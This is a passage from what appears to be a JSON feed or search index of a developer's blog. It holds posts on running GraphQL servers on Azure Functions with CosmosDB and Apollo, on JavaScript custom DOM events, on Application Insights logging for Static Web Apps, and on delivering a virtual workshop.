_jsonQueryResultSerializer.SerializeAsync((IReadOnlyQueryResult)result, httpContext.Response.Body); return new EmptyResult(); } There’s two things we’ve done here, first is adding that new argument so we match the signature of the interface, secondly is when the QueryRequestBuilder is being setup we’ll loop over the context dictionary and add each item as a property of the resolver context.\nAnd lastly, we need to update the Function itself to have an input binding to CosmosDB, and then provide that to the resolvers:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [FunctionName("graphql")] public async Task<IActionResult> Run( [HttpTrigger(AuthorizationLevel.Anonymous, "get", "post", Route = null)] HttpRequest req, ILogger log, [CosmosDB( databaseName: "trivia", collectionName: "questions", ConnectionStringSetting = "CosmosDBConnection")] DocumentClient client, CancellationToken cancellationToken) { return await _graphQLFunctions.ExecuteFunctionsQueryAsync( req.HttpContext, new Dictionary<string, object> { { "client", client }, { "log", log } }, cancellationToken); } With that sorted we can implement our resolvers. 
Let’s start with the GetQuestions one to grab all of the questions from CosmosDB:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 public async Task<IEnumerable<QuestionModel>> GetQuestions(IResolverContext context) { var client = (DocumentClient)context.ContextData["client"]; var collectionUri = UriFactory.CreateDocumentCollectionUri("trivia", "questions"); var query = client.CreateDocumentQuery<QuestionModel>(collectionUri) .AsDocumentQuery(); var quizzes = new List<QuestionModel>(); while (query.HasMoreResults) { foreach (var result in await query.ExecuteNextAsync<QuestionModel>()) { quizzes.Add(result); } } return quizzes; } Using the IResolverContext we can access the ContextData which is a dictionary containing the properties that we’ve injected, one being the DocumentClient. From here we create a query against CosmosDB using CreateDocumentQuery and then iterate over the result set, pushing it into a collection that is returned.\nTo get a single question we can implement the GetQuestion resolver:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 public async Task<QuestionModel> GetQuestion(IResolverContext context, string id) { var client = (DocumentClient)context.ContextData["client"]; var collectionUri = UriFactory.CreateDocumentCollectionUri("trivia", "questions"); var sql = new SqlQuerySpec("SELECT * FROM c WHERE c.id = @id"); sql.Parameters.Add(new SqlParameter("@id", id)); var query = client.CreateDocumentQuery<QuestionModel>(collectionUri, sql, new FeedOptions { EnableCrossPartitionQuery = true }) .AsDocumentQuery(); while (query.HasMoreResults) { foreach (var result in await query.ExecuteNextAsync<QuestionModel>()) { return result; } } throw new ArgumentException("ID does not match a question in the database"); } This time we are creating a SqlQuerySpec to do a parameterised query for the item that matches with the provided ID. One other difference is that I needed to enable CrossPartitionQueries in the FeedOptions, because the id field is not the partitionKey, so you may not need that, depending on your CosmosDB schema design. 
And eventually, once the query completes we look for the first item, and if none exists we raise an exception that’ll bubble out as an error from GraphQL.\nConclusion With all this done, we now have our GraphQL server running in Azure Functions and connected up to a CosmosDB backend, with no need to do any connection management ourselves; that’s taken care of by the input binding.\nYou’ll find the full code of my sample on GitHub.\nWhile this has been a read-only example, you could expand this out to support GraphQL mutations and write data to CosmosDB with a few more resolvers.\nSomething else worth exploring is how you can look at the fields being selected in the query, and only retrieve that data from CosmosDB, because here we’re pulling all fields, but if you create a query like:\n1 2 3 4 5 6 7 8 { questions { id question correctAnswer incorrectAnswers } } It might be optimal to not return fields like type or category from CosmosDB.\n", "id": "2020-09-04-graphql-on-azure-part-4-serverless-comsosdb" }, { "title": "Custom Events in JavaScript", "url": "https://www.aaron-powell.com/posts/2020-08-21-custom-events-in-javascript/", "date": "Fri, 21 Aug 2020 15:09:34 +1000", "tags": [ "javascript", "web" ], "description": "Let's have a look at how to create and use custom events in JavaScript", "content": "Messaging systems in JavaScript, here we go again.\nOk, so it’s something I’ve written about a few times before, generally in the context of creating a pub/sub library, but in this post we’re going to look at something a bit different, how to use the event system in the DOM.\nWhile working with the DOM you’ll undoubtedly have used the events that are provided, things like onclick, onchange, onkeypress, etc. as these are events that the DOM will raise when it is interacted with. The invocation of these events is beyond your control, other than the fact that your interaction is probably what caused them, but we can add listeners for them and do things when they occur.\nCurrently on my Twitch channel, I’m streaming the build of a web application that will show a selected list of timezones to allow you to compare across them. For this application I’m going framework free, meaning no React, no TypeScript, no CSS frameworks or anything like that, and doing so has meant that I’m looking at how to effectively handle things that happen within the application.\nSome of the components that are in the application do things that other parts of the application might want to respond to, so for this I started to look at how we can use custom events in the browser, rather than writing a pub/sub library… again.\nAnatomy of a DOM Event To understand a custom event, let’s quickly look at the DOM events. DOM events all share a parent type, Event, but are subclassed for the event they represent, like MouseEvent, KeyboardEvent or UIEvent, to name a few. The Event base class has useful information such as the target of the event, whether it can bubble to parent elements or whether it can be cancelled, with the subclasses then having specific data for that event type, like the key pressed or the mouse position.\nEvents all bubble by default, which means that the element that the event came from isn’t the only place you can listen to it, you can listen all the way up to window.
You can see this in action by opening your browser DevTools (generally F12) and then running this in the JavaScript console:\n1 window.addEventListener("click", e => console.log(e)); Now start clicking around the page, notice that you get log messages appearing, and if you inspect them you’ll notice that the srcElement property is the element that you clicked on. If you change the above code from window to document and run it, you’ll now have two messages logged out, both are the same and have the same event object.\nThis is because the event has bubbled up from the element you originally clicked on to all of its parents until it ran out of parents. This is a useful trick if you want to have a single handler that can handle the same event from multiple places in the same way.\nCustom Events But what if we want to create our own event? In my Twitch stream I need to update the time every second, but there could be multiple timezones on display, so how would I go about doing that? Well, I could use a setInterval that then uses document.querySelectorAll to find the elements based on the DOM structure I expect there to be, but the problem is that that becomes a little brittle: one component, the “time manager”, needs to know about the internal structure of another component, the “time display”.\nThis is where a custom event can be useful, so let’s look at it. First up, we’ll need to define a custom event and there are two ways to do that, either using the CustomEvent constructor, or by creating our own class inheriting Event. Here’s how we can use the CustomEvent constructor:\n1 const timeUpdated = new CustomEvent("timeUpdated", { detail: { now: Date.now() } }); CustomEvent takes two bits of information, first is the type of the event, and this is what you would then listen to elsewhere in your code, and secondly it takes an options object whose detail property contains the custom data you want to add to the event object that the listeners will receive.\nNow, if you were to create your own class it’d look like this:\n1 2 3 4 5 6 class TimeUpdatedEvent extends Event { constructor(time) { super("timeUpdated"); this.time = time; } } The major difference here is that we provide the event type to the super call in the constructor, which calls the constructor for Event and that in turn sets the type, otherwise it’s very much the same. My personal preference is to create the subclass for Event as then I know that I’m being consistent each time that I use my custom event types.\nWith our custom event ready, we need to dispatch the event, and that is done with the dispatchEvent method which exists on anything that the browser considers an EventTarget (which is a fancy way of saying things that are part of the DOM).\n1 window.dispatchEvent(new TimeUpdatedEvent(Date.now())); The last thing we need to do is to add a listener to the event:\n1 2 3 window.addEventListener("timeUpdated", e => { console.log(`The time is ${e.time}`); }); There we have it, we can dispatch a custom event and then listen to it elsewhere in the code.\nBubbling Events Going back up to the demo where we looked at the way the click event worked, we saw that the event bubbled up through the parents of the originating element.
We can do this ourselves as well, but we need to explicitly tell the custom event that we want to have it bubble because by default it will only dispatch on the element that it was dispatched against, not any of its parents.\nTo do this, we need to set the bubbles property to true:\n1 2 3 4 5 6 class TimeUpdatedEvent extends Event { constructor(time) { super("timeUpdated", { bubbles: true }); this.time = time; } } When using a subclass we pass this as a 2nd argument to the super call, and if we use CustomEvent directly, add it as a property of the 2nd argument there. Now when your event is dispatched it’ll go through each of its parents until it hits the top of the structure and stop. This pattern is useful if you want a component to not expose its internal DOM structure in any way, but still allow outsiders to listen to events.\nCancelling Events Sometimes an event might be an indicator that something is about to happen. Take the onsubmit event from the <form> element, which is called before the form submits itself to the target, generally POSTing data to a server. If you’re wanting to use JavaScript to submit the form data you don’t want the default browser action to continue, and that is when we’d call preventDefault on the event. This tells the browser that the default action shouldn’t be done, and in the case of a form, the submit won’t go ahead.\nWhen it comes to a custom event, there are plenty of reasons we might want to stop the default action, maybe it’s an indication that some data already exists in the data source so you don’t want to go ahead with adding a duplicate record.\nBy default though a custom event can’t be cancelled as the cancelable property is set to false. This can be changed by passing cancelable: true to the constructor. Now your event listeners can call preventDefault on the event and you can check the defaultPrevented property when the listeners are complete.\n1 2 3 4 5 6 7 8 const ce = new CustomEvent("longRunningOperation", { cancelable: true }); window.addEventListener("longRunningOperation", e => e.preventDefault()); window.dispatchEvent(ce); if (ce.defaultPrevented) { console.log("you didn't want that done"); } Events are Synchronous Something to be aware of, especially in the context of having cancelable events, is that the event listeners are executed in a synchronous manner, meaning that if your listener wants to cancel the event it’ll need to make that decision without waiting for any asynchronous operation to complete (like a Promise continuation).\nTo see what I mean, try this code out:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 const ce = new CustomEvent("longRunningOperation", { cancelable: true }); window.addEventListener("longRunningOperation", async e => { const p = new Promise(res => { setTimeout(() => { console.log("preventing default"); e.preventDefault(); console.log("default prevented"); res(); }, 1000); }); console.log("before promise"); await p; console.log("after promise"); }); window.dispatchEvent(ce); if (ce.defaultPrevented) { console.log("you didn't want that done"); } else { console.log("carry on"); } What you’ll see is output like so:\nbefore promise carry on preventing default default prevented after promise Unfortunately, we weren’t able to cancel our event before it checked if we cancelled it.
So be aware of this and if you need to cancel the event as the result of an async operation, you’ll need to think through the design of your event system more closely.\nConclusion In this post we’ve taken a look at how we can leverage the DOM’s built in event system to create our own custom events to raise between parts of our application that would better describe the intent of an event, rather than the more generic events that come out of the DOM itself.\nIf you want to see this in action, pop by my Twitch stream, where I stream each Friday at midday (Sydney time).\n", "id": "2020-08-21-custom-events-in-javascript" }, { "title": "Getting Logs From Static Web Apps APIs", "url": "https://www.aaron-powell.com/posts/2020-08-12-getting-logs-from-static-web-apps-apis/", "date": "Wed, 12 Aug 2020 14:35:09 +1000", "tags": [ "serverless" ], "description": "A quick tip on how to make it easier to diagnose production problems with Static Web Apps", "content": "I’ve been doing a lot recently with Azure Static Web Apps, mainly because I find it to be a service that really fits me needs. Sometimes though, I write code that has a bug in it, especially in the Functions backend, and that can be difficult to diagnose.\nThe other day I found myself in such a situation, the API worked locally, but when deployed to Azure it didn’t. sigh And as the service is in preview the debugging story is still not great. sigh again\nNow, we know that the API for the Static Web Apps is Azure Functions and Functions integrates with App Insights, so I figured there has to be some way to tap into that.\nFirst up, we need to create an Application Insights resource in Azure:\nOnce the resource is created, copy the Instrumentation Key for it:\nNow we can head over to our Static Web App, then navigate to it’s Configuration and click Add:\nWe need to add a new configuration value named APPINSIGHTS_INSTRUMENTATIONKEY which has the value of your Instrumentation Key. Once this is saved the Functions are restarted and connected to App Insights. All that’s left is to start generating some errors and check out the exceptions query.\nA bonus tip is that if you want to look at anything you write out to the logs of Azure Functions (context.log in JavaScript), they are available in the traces table.\nConclusion It’s not immediately obvious how to connect up a Static Web Apps backend API to App Insights, but as it’s Functions under the hood it really only takes a APPINSIGHTS_INSTRUMENTATIONKEY being set. And since configuration values are per-environment, you can use a different App Insights for your non-production instance easily.\nAnd a shout-out to Anthony Chu who pointed me in this direction.\n", "id": "2020-08-12-getting-logs-from-static-web-apps-apis" }, { "title": "GraphQL on Azure: Part 3 - Serverless With JavaScript", "url": "https://www.aaron-powell.com/posts/2020-08-07-graphql-on-azure-part-3-serverless-with-javascript/", "date": "Fri, 07 Aug 2020 11:08:58 +1000", "tags": [ "azure", "serverless", "azure-functions", "javascript", "graphql" ], "description": "Let's look at how we can create a JavaScript GraphQL server and deploy it to an Azure Function", "content": "Last time we look at how to get started with GraphQL on dotnet and we looked at the Azure App Service platform to host our GraphQL server. Today we’re going to have a look at a different approach, using Azure Functions to create run GraphQL in a Serverless model. 
We’ll also look at using JavaScript (or specifically, TypeScript) for this codebase, but there’s no reason you couldn’t deploy a dotnet GraphQL server on Azure Functions or deploy JavaScript to App Service.\nGetting Started For the server, we’ll use the tooling provided by Apollo, specifically their server integration with Azure Functions, which will make it place nicely together.\nWe’ll create a new project using Azure Functions, and scaffold it using the Azure Functions Core Tools:\n1 2 func init graphql-functions --worker-runtime node --language typescript cd graphql-functions If you want JavaScript, not TypeScript, as the Functions language, change the --language flag to javascript.\nNext, to host the GraphQL server we’ll need a Http Trigger, which will create a HTTP endpoint in which we can access our server via:\n1 func new --template "Http Trigger" --name graphql The --name can be anything you want, but let’s make it clear that it’s providing GraphQL.\nNow, we need to add the Apollo server integration for Azure Functions, which we can do with npm:\n1 npm install --save apollo-server-azure-functions Note: if you are using TypeScript, you need to enable esModuleInterop in your tsconfig.json file.\nLastly, we need to configure the way the HTTP Trigger returns to work with the Apollo integration, so let’s open function.json within the graphql folder, and change the way the HTTP response is received from the Function. By default it’s using a property of the context called res, but we need to make it explicitly return be naming it $return:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 { "bindings": [ { "authLevel": "function", "type": "httpTrigger", "direction": "in", "name": "req", "methods": ["get", "post"] }, { "type": "http", "direction": "out", "name": "$return" } ], "scriptFile": "../dist/graphql/index.js" } Implementing a Server We’ve got out endpoint ready, it’s time to start implementing the server, which will start in the graphql/index.ts file. Let’s replace it with this chunk:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 import { ApolloServer, gql } from "apollo-server-azure-functions"; const typeDefs = gql` type Query { graphQLOnAzure: String! } `; const resolvers = { Query: { graphQLOnAzure() { return "GraphQL on Azure!"; } } }; const server = new ApolloServer({ typeDefs, resolvers }); export default server.createHandler(); Let’s talk about what we did here, first up we imported the ApolloServer which is the server that will handle the incoming requests on the HTTP Trigger, we use that as the very bottom by creating the instance and exporting the handler as the module export.\nNext, we imported gql, which is a template literal that we use to write our GraphQL schema in. The schema we’ve created here is pretty basic, it only has a single type, Query on it that has a single member to output.\nLastly, we’re creating an object called resolvers, which are the functions that handle the request when it comes in. 
You’ll notice that this object mimics the structure of the schema we provided to gql, by having a Query property which then has a function matching the name of the available queryable values.\nThis is the minimum that needs to be done and if you fire up func start you can now query the GraphQL endpoint, either via the playground of from another app.\nImplementing our Quiz Let’s go about creating a more complex solution, we’ll implement the same Quiz that we did in dotnet.\nWe’ll start by defining the schema that we’ll have on our server:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 const typeDefs = gql` type Quiz { id: String! question: String! correctAnswer: String! incorrectAnswers: [String!]! } type TriviaQuery { quizzes: [Quiz!]! quiz(id: String!): Quiz! } schema { query: TriviaQuery } `; Now we have two types defined, Quiz and TriviaQuery, then we’ve added a root node to the schema using the schema keyword and then stating that the query is of type TriviaQuery.\nWith that done, we need to implement the resolvers to handle when we request data.\n1 2 3 const resolvers = { TriviaQuery: {} }; This will compile and run, mostly because GraphQL doesn’t type check that the resolver functions are implemented, but you’ll get a bunch of errors, so instead we’ll need implement the quizzes and quiz resolver handlers.\nHandling a request Let’s implement the quizzes handler:\n1 2 3 4 5 6 7 const resolvers = { TriviaQuery: { quizzes: (parent, args, context, info) => { return null; } } }; The function will receive 4 arguments, you’ll find them detailed on Apollo’s docs, but for this handler we really only need one of them, context, and that will be how we’ll get access to our backend data source.\nFor the purposes of this blog, I’m skipping over the implementation of the data source, but you’ll find it on my github.\n1 2 3 4 5 6 7 8 const resolvers = { TriviaQuery: { quizzes: async (parent, args, context, info) => { const questions = await context.dataStore.getQuestions(); return questions; } } }; You might be wondering how the server knows about the data store and how it got on that context argument. This is another thing we can provide to Apollo server when we start it up:\n1 2 3 4 5 6 7 const server = new ApolloServer({ typeDefs, resolvers, context: { dataStore } }); Here, dataStore is something imported from another module.\nContext gives us dependency injection like features for our handlers, so they don’t need to establish data connections themselves.\nIf we were to open the GraphQL playground and then execute a query like so:\n1 2 3 4 5 6 7 8 query { quizzes { question id correctAnswer incorrectAnswers } } We’ll get an error back that Quiz.correctAnswer is a non-null field but we gave it null. The reason for this is that our storage type has a field called correct_answer, whereas our model expects it to be correctAnswer. 
To address this we’ll need to do some field mapping within our resolver so it knows how to resolve the field.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 const resolvers = { TriviaQuery: { quizzes: async (parent, args, context, info) => { const questions = await context.dataStore.getQuestions(); return questions; } }, Quiz: { correctAnswer: (parent, args, context, info) => { return parent.correct_answer; }, incorrectAnswers: (parent, args, context, info) => { return parent.incorrect_answers; } } }; This is a resolver chain, it’s where we tell the resolvers how to handle sub-fields of an object and it acts just like a resolver itself, so we have access to the same context and if we needed to do another DB lookup, we could.\nNote: These resolvers will only get called if the fields are requested from the client. This avoids loading data we don’t need.\nYou can go ahead and implement the quiz resolver handler yourself, as it’s now time to deploy to Azure.\nDisabling GraphQL Playground We probably don’t want the Playground shipping to production, so we’d need to disable that. That’s done by setting the playground property of the ApolloServer options to false. For that we can use an environment variable (and set it in the appropriate configs):\n1 2 3 4 5 6 7 8 const server = new ApolloServer({ typeDefs, resolvers, context: { dataStore }, playground: process.env.NODE_ENV === "development" }); For the sample on GitHub, I’ve left the playground enabled.\nDeploying to Azure Functions With all the code complete, let’s look at deploying it to Azure. For this, we’ll use a standard Azure Function running the latest Node.js runtime for Azure Functions (Node.js 12 at the time of writing). We don’t need to do anything special for the Functions, it’s already optimised to run a Node.js Function with a HTTP Trigger, which is all this really is. If we were using a different runtime, like .NET, we’d follow the standard setup for a .NET Function app.\nTo deploy, we’ll use GitHub Actions, and you’ll find docs on how to do that already written, and I’ve done a video on this as well. You’ll find the workflow file I’ve used in the GitHub repo.\nWith a workflow committed and pushed to GitHub and our App Service waiting, the Action will run and our application will be deployed. 
The demo I created is here.\nConclusion Throughout this post we’ve taken a look at how we can create a GraphQL server running inside a JavaScript Azure Functions using the Apollo GraphQL server, before finally deploying it to Azure.\nWhen it comes to the Azure side of things, there’s nothing different we have to to do run the GraphQL server in Azure Functions, it’s just treated as a HTTP Trigger function and Apollo has nice bindings to allow us to integrate the two platforms together.\nAgain, you’ll find the complete sample on my GitHub for you to play around with yourself.\n", "id": "2020-08-07-graphql-on-azure-part-3-serverless-with-javascript" }, { "title": "A Guide to Virtual Workshops", "url": "https://www.aaron-powell.com/posts/2020-07-30-a-guide-to-virtual-workshops/", "date": "Thu, 30 Jul 2020 04:55:27 +1000", "tags": [ "public-speaking", "conference" ], "description": "I recently ran my first virtual workshop and wanted to share how I did it and some thoughts I had on doing it", "content": "Since the COVID-19 pandemic started I’ve done a number of virtual events (I shared my thoughts on being successful with them last week) but earlier this week I did something new, I ran a two-day workshop as part of the NDC Melbourne virtual event programming.\nStarted day 1 of @slace's #React workshop at @NDC_Conferences Melbourne Online! pic.twitter.com/78XzRE4w3m\n— Melissa Houghton (@meliss_houghton) July 27, 2020 The workshop was the React for Beginners workshop that I’ve been running as part of NDC Sydney for the past few years (and originally created with Jake Ginnivan) but normally it’s done in person in person, so I wanted to do a write up on how I ran it virtually, what worked and where I feel there’s room for improvement.\nConsiderations for Online Workshops When I was getting prepared to deliver the workshop there were a few things that I started to consider on what would make the experience as seamless for attendees. Since I’m pretty familiar with how to deliver the workshop in person, I wanted to try and replicate as much of a normal experience as I could, even though I wasn’t able to walk about the room and talk to people.\nThe first thing to think about is how would I engage with the attendees. I mentioned in my online events post that you can run an event in one of two formats, conference call or broadcast. Since a workshop should be an interactive experience a conference call format is the optimal way to go, I can see the people (if they turn on their camera) and we can talk to each other. NDC uses WebEx as the platform for this (I did have an option for Zoom, but WebEx is their preferred), it does what you need it to do, but personally I would avoid WebEx as a platform as I found it clunky to use and the desktop app error prone (I ended up running it in the browser which was more stable).\nThe next consideration I had was how would we make it optimal for people to see the slides and code as I share it. Having been on both sides of virtual tech presentations I know what it’s like when the text is hard to read because I forgot to bump the font size, but then you also need to consider latency and visual artefact on the stream, will the text be legible? 
So, you need to think about what the best way for everyone will be to ensure they can watch what you’re presenting.\nFinally, since the workshop is hands on, attendees build something throughout, I needed to think through what options we’d have to replace the normal experience of an instructor coming and sitting next to them to pair on a problem.\nSetting Up a Studio I’ve been doing some video stuff recently (including streaming every Friday on my Twitch channel) so I’ve been learning about how to use OBS Studio. OBS (Open Broadcast Software) is an open source application for creating video streams and gives you the ability to take different inputs, combine them together, produce a single output feed. It can be a bit daunting to get started with but you’ll find plenty of videos on YouTube (here’s a good starting point) and once you get the basics down, it’s really fun to see how you get set everything up and make you look professional.\nCamera For the workshop, I was presenting from my home office which looks like this.\nThis room use to be our baby room, before our kids started to share, but it still contains some of the facilities of being a baby room, like the nappy change table, one of their wardrobes, and generally, piles of junk. This isn’t really what I wanted everyone to have to deal with in my background (and I don’t need it for calls that I’m on or when I’m streaming), but I don’t have the facilities to setup a green screen behind me, since there’s a door in the way.\nThankfully, there’s a solution to that, a virtual green screen. Early on in the pandemic one of my colleagues introduced me to XSplit VCam, which runs as an interception of your webcam feed and allows you to do things like background blur, virtual backgrounds or background removal. It’s not perfect, as it’s using image detection to work out where a person is in the image and do removal of everything else, but it’s good enough. Using XSplit with a virtual background I now look like this:\nYou can see the edges of me are fuzzing out, but overall, it’s a better picture than the junk background. If you can smooth out what’s behind you (I closed the wardrobe and draped a solid-colour towel over the hanging stuff) then it’ll become even better. It might not be as good as a proper green screen but it’s a lot simpler to use!\nPresenting When it comes to presenting online, you’ll share your screen (or share an app) and everyone sees that in full screen, but the cameras are pushed away to focus on the content. This starts removing the personalisation aspect of the session as you lose the connection to the presenter. Not ideal if we’re going to be spending two days together on a call.\nTo tackle this, I decided to change the presentation format up from a screen share to creating using a virtual camera.\nUsing OBS I created a scene which is made up of three components, my camera feed via XSplit with background removal, a background image for NDC Melbourne and my screen. 
I layered my camera on top of everything so I’m now sitting in front of the slides (or code) and can talk to the slides just over my shoulder.\nI then created another scene for when we were in code which increased the size of the shared screen and decreased the size of me.\nWith these two scenes I, as the presenter, was clearly visible the whole time making it easier to maintain a connection to the audience, even though I can’t see them.\nLastly, this video feed needs to be sent back out over the presentation platform (WebEx in this case), and to do that you’ll need a virtual camera plugin for OBS. Scott Hanselman has a great post on how to set this up and I went down the route of using NDI to expose the feed from OBS and then NDI’s virtual camera to send the feed over the call.\nDownsides to Virtual Cameras Mostly, this approach worked really well for us, but there is a downside to using a virtual camera rather than traditional screen sharing, and that is that conference call software is designed to have the person who’s speaking as the camera in focus. This can be a problem when your camera is also your presentation medium, since if someone else’s audio comes in (they ask a question or they aren’t on mute and make a noise) all of a sudden your camera is defocused and people can’t follow along.\nMy tip here is to have everyone on mute by default, so that you are considered the active speaker, or if your software allows it, get people to pin the camera view of you. You’d best doing a tech check or two to practice just how it’ll work and what your attendees will see so you can be prepared to help someone through a loss of video.\nLightening the Load Anyone who’s used OBS, whether it’s to stream coding or gaming, will know that it can be heavy on system resources, combine this with an app doing virtual a green screen, running a browser + editor + whatever tooling you need and finally, connecting to the call you’re presenting on, well you need to have a pretty powerful machine.\nAlas, I don’t have that. Sure, I’ve got a top-spec’ed Surface Book 2, but it isn’t quite powerful enough for all this stuff (as you’ll may have seen if you’ve joined any of my Twitch streams). So, I needed to think creatively here, or I would fall back to the obvious solution to just simplify my life and not try and run a production studio in conjunction to the call.\nEnter NDI.\nNDI, Network Device Interface, is a standard for sharing audio and video over a network connection. If you want to splash some cash you can buy devices that you connect as an external monitor that then makes it available as a network source to OBS, but I don’t have a $1000 to spend, so instead we’ll go with a software solution, OBS’s NDI plugin.\nUsing this plugin, you can expose OBS from one machine to be received by another machine on as an input to NDI’s virtual camera. This means that I no longer needed to connect to WebEx on my laptop, and instead have that running on a separate device, freeing up some CPU cycles for everything else. This also meant that I had a level of redundancy. 
If my laptop that’s running the slides/demo went offline, it didn’t kill the call, I could still chat with attendees while doing a recovery on my main device (thankfully it didn’t happen, but it was in the back of my mind), similarly if the call dropped I could re-connect and the screen would easily come back up at the exact correct place.\nThis did mean that my Surface Book 2 was outputting an NDI stream over my wifi network to my Surface Pro4 that was turning it into a webcam to push out via WebEx. Yeah, totally not an over-engineered setup at all! 😂\nImproving Accessibility One of the biggest hurdles with online events is accessibility. I’m lucky to have a decent (by Australian standards) internet connection at home, a large screen, good hearing and vision, but not everyone is in the same situation. And also, given that it was two days online I was anticipating that at some point the video would lose frames and the quality would drop, I wanted some way to ensure that the attendees would be able to still read what I was presenting.\nPowerPoint I was presenting the slides out of PowerPoint and this gives you some options in how you can improve access to the slides for attendees. If you’re on a Windows machine you can use Office Presentation Services, which allows you to start a presentation and then share a URL to the slides to the attendees. Attendees can then connect in their browser and watch along as you move through a deck, as well as download the slides (if you enable it). Alternatively, if you have a Microsoft 365 account you can use Live Presentations which works similar, but gives you a QR code for the attendees to scan (as well as the URL), live transcription and reactions. The transcription feature even offers the viewer the ability to change the language that the transcription is played in, so if English isn’t their preferred language, they can optimise for their experience.\nThe only downside of this was that all the hard work I’d put in to creating a fancy scene setup in OBS and stung together with NDI so that they still had a connection to the talking head was put aside, but that’s a minor point when it comes to improving the accessibility of content for your audience.\nCode As you might’ve noticed in the screenshot above of my editor, I have a rather random colour pallet in use. I figure that an editor is somewhere I’m spending a lot of time, so why not make it bright and fun, so I switch between a few really whacky themes, but I do appreciate that this isn’t everyone’s preference, we all have the font size just right, the colours that work best for us and windows docked where they need to be. Also, as I mentioned above, the chance of a degraded video quality is high, and you don’t want people to fall behind because they’re dropping frames.\nTo reduce this barrier we can use Visual Studio Live Share which is a service that allows you to setup a remote connection into your editor that anyone can join and collaborate in (or watch if you make it read-only). The best part is that while I might be using VS Code, others can use Visual Studio or just connect in the browser, meaning that people could follow along in their preferred experience, not in what you deem to be optimal. 
When I was talking with some of the attendees, one made a comment that they found this useful as they could then go exploring the codebase themselves, which I hadn’t thought of as a benefit, but it meant if they wanted a reminder of how we did something earlier, they didn’t need me to swap to a different file, they could just do it themselves.\nAnother idea with Live Share, which we didn’t use this time but I want to try in future, is that attendees can share their editor with the teacher, allowing you to pair through a problem, just like you would do in person by sitting with a student.\nHitting the Ground Running Having run this workshop in person a few times I know that one of the challenges that we always faced is ensuring that people were able to start writing code quickly, and not spending time installing software and getting an environment setup. When you’re in person you can easily sit with someone and work through an error they are receiving, but it’s a lot harder when it’s virtual, so to streamline the process make sure that you have a really comprehensive setup guide that people can follow before you get started. Detail out potential error messages that will come up and how to work through them, so that people can be as ready as possible before getting started.\nAnother option worth exploring (but wasn’t viable for this workshop) is using Visual Studio Codespaces or VS Code Remote Containers. Both of these options allow you to configure the development environment and have it ready to go with all needed dependencies and extensions (for VS Code) so that people don’t need to worry about what version of the runtime do I need? issues. There is a limitation of people either needing an Azure account (since Codespaces isn’t free) or Docker to run a container, but if your tool chain is complex, maybe it’s a small price to pay to save setup complexity.\nAlso, consider recording a welcome video for your attendees. Introduce yourself and the workshop to them, talk to them about what they’ll learn, cover off the setup guide, setup ground rules, etc. so that people are as prepared as they can be coming into day one.\nBe Interactive This is the biggest learning I took away as a teacher, just how much harder interaction is in a virtual workshop. People can be shy and not want to speak up on a call, I can understand that, so it’s up to you as the instructor to foster interaction with participants.\nLook to leverage things like polls or quizzes throughout the workshop so that people can test their knowledge. Avoid asking questions of the floor and instead ask directly to an attendee. These are two things I didn’t do and looking back it was a missed opportunity.\nBut also deviate from “the script” to inject some personality. I changed my VS Code theme throughout the workshop to mix it up and then talked about different themes. I got sidetracked when looking for something in search results and started talking about a random topic instead. My kids pop their heads in because they were at home and bored because it was raining. I joked with one of the attendees who was in the UK, so they were doing the workshop from midnight to 8am about having lunch at 4am is simply weird.\nConclusion Online workshops are hard, much harder than a normal presentation because you are no longer able to sit with your students and just check in with them, but there are things you can do to make it a bit easier.\nThink about how you’re going to feel connected with the attendees. 
Sure, I might have had an over-engineered setup in place, but it was a bit of fun and injected some of my quirky personality into it.\nThink about how you can improve accessibility. Leverage tools like presenting your slides on a publicly accessible URL and using Live Share for everyone to jump into your editor.\nThink about how you can simplify everyone’s setup experience, remembering that you’re unlikely to be able to see their screen and help them debug, so give them the tools beforehand. Or, if it’s possible, pre-provision an environment with Codespaces or a Dockerfile.\nThink about how to be interactive. I realise now that I wasn’t as interactive as I should’ve been, so it could’ve been a very long two days of people watching PowerPoint and someone code. So, make sure they feel a part of the event.\nLastly, have fun. It’s a long time to be learning but if you’re having fun as a teacher that’ll impart on your students.\n", "id": "2020-07-30-a-guide-to-virtual-workshops" }, { "title": "GraphQL on Azure: Part 2 - dotnet and App Service", "url": "https://www.aaron-powell.com/posts/2020-07-21-graphql-on-azure-part-2-app-service-with-dotnet/", "date": "Tue, 21 Jul 2020 08:16:33 +1000", "tags": [ "azure", "serverless", "azure-functions", "dotnet", "graphql" ], "description": "Let's look at how we can create a dotnet GraphQL server and deploy it to an AppService", "content": "In my introductory post we saw that there are many different ways in which you can host a GraphQL service on Azure and today we’ll take a deeper look at one such option, Azure App Service, by building a GraphQL server using dotnet. If you’re only interested in the Azure deployment, you can jump forward to that section. Also, you’ll find the complete sample on my GitHub.\nGetting Started For our server, we’ll use the graphql-dotnet project, which is one of the most common GraphQL server implementations for dotnet.\nFirst up, we’ll need an ASP.NET Core web application, which we can create with the dotnet cli:\ndotnet new web Next, open the project in an editor and add the NuGet packages we’ll need:\n1 2 3 <PackageReference Include="GraphQL.Server.Core" Version="3.5.0-alpha0046" /> <PackageReference Include="GraphQL.Server.Transports.AspNetCore" Version="3.5.0-alpha0046" /> <PackageReference Include="GraphQL.Server.Transports.AspNetCore.SystemTextJson" Version="3.5.0-alpha0046" /> At the time of writing graphql-dotnet v3 is in preview, we’re going to use that for our server but be aware there may be changes when it is released.\nThese packages will provide us a GraphQL server, along with the middleware needed to wire it up with ASP.NET Core and use System.Text.Json as the JSON seralizer/deserializer (you can use Newtonsoft.Json if you prefer with this package).\nWe’ll also add a package for GraphiQL, the GraphQL UI playground, but it’s not needed or recommended when deploying into production.\n1 <PackageReference Include="GraphQL.Server.Ui.Playground" Version="3.5.0-alpha0046" /> With the packages installed, it’s time to setup the server.\nImplementing a Server There are a few things that we need when it comes to implementing the server, we’re going to need a GraphQL schema, some types that implement that schema and to configure our route engine to support GraphQL’s endpoints. We’ll start by defining the schema that’s going to support our server and for the schema we’ll use a basic trivia app (which I’ve used for a number of GraphQL demos in the past). 
